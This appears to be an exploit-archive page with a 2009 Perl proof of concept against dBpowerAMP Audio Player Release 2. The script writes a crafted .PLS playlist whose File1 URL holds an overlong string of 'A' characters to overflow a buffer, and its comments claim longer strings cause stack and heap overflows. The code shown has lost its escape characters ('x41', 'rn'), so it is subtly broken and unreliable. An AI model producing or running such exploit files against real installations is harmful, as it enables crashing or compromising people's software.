[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : dBpowerAMP Audio Player 2 .PLS File Local Buffer Overflow PoC
# Published : 2009-01-13
# Author : Stack
# Previous Title : PowerPoint Viewer OCX 3.1 Remote File Overwrite Exploit
# Next Title : Nofeel FTP Server 3.6 (CWD) Remote Memory Consumption Exploit
#!/usr/bin/perl
# dBpowerAMP Audio Player Release 2.PLS Local Buffer Overflow Exploit
# Down : http://www.dbpoweramp.com/bin/dBpowerAMP-r2.exe
# Desc : in 257 A' Basic buffer overflow
# in 1000 A' Stack overflow
# in 3000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
use strict;
use warnings;
my $A= "x41" x 257;
open(my $pls_playlist, "> stack.pls");
print $pls_playlist "[playlist]rn".
"NumberOfEntries=1rn".
"File1=http://".
$A.
"rn";
close $pls_playlist;
# www.Syue.com [2009-01-13]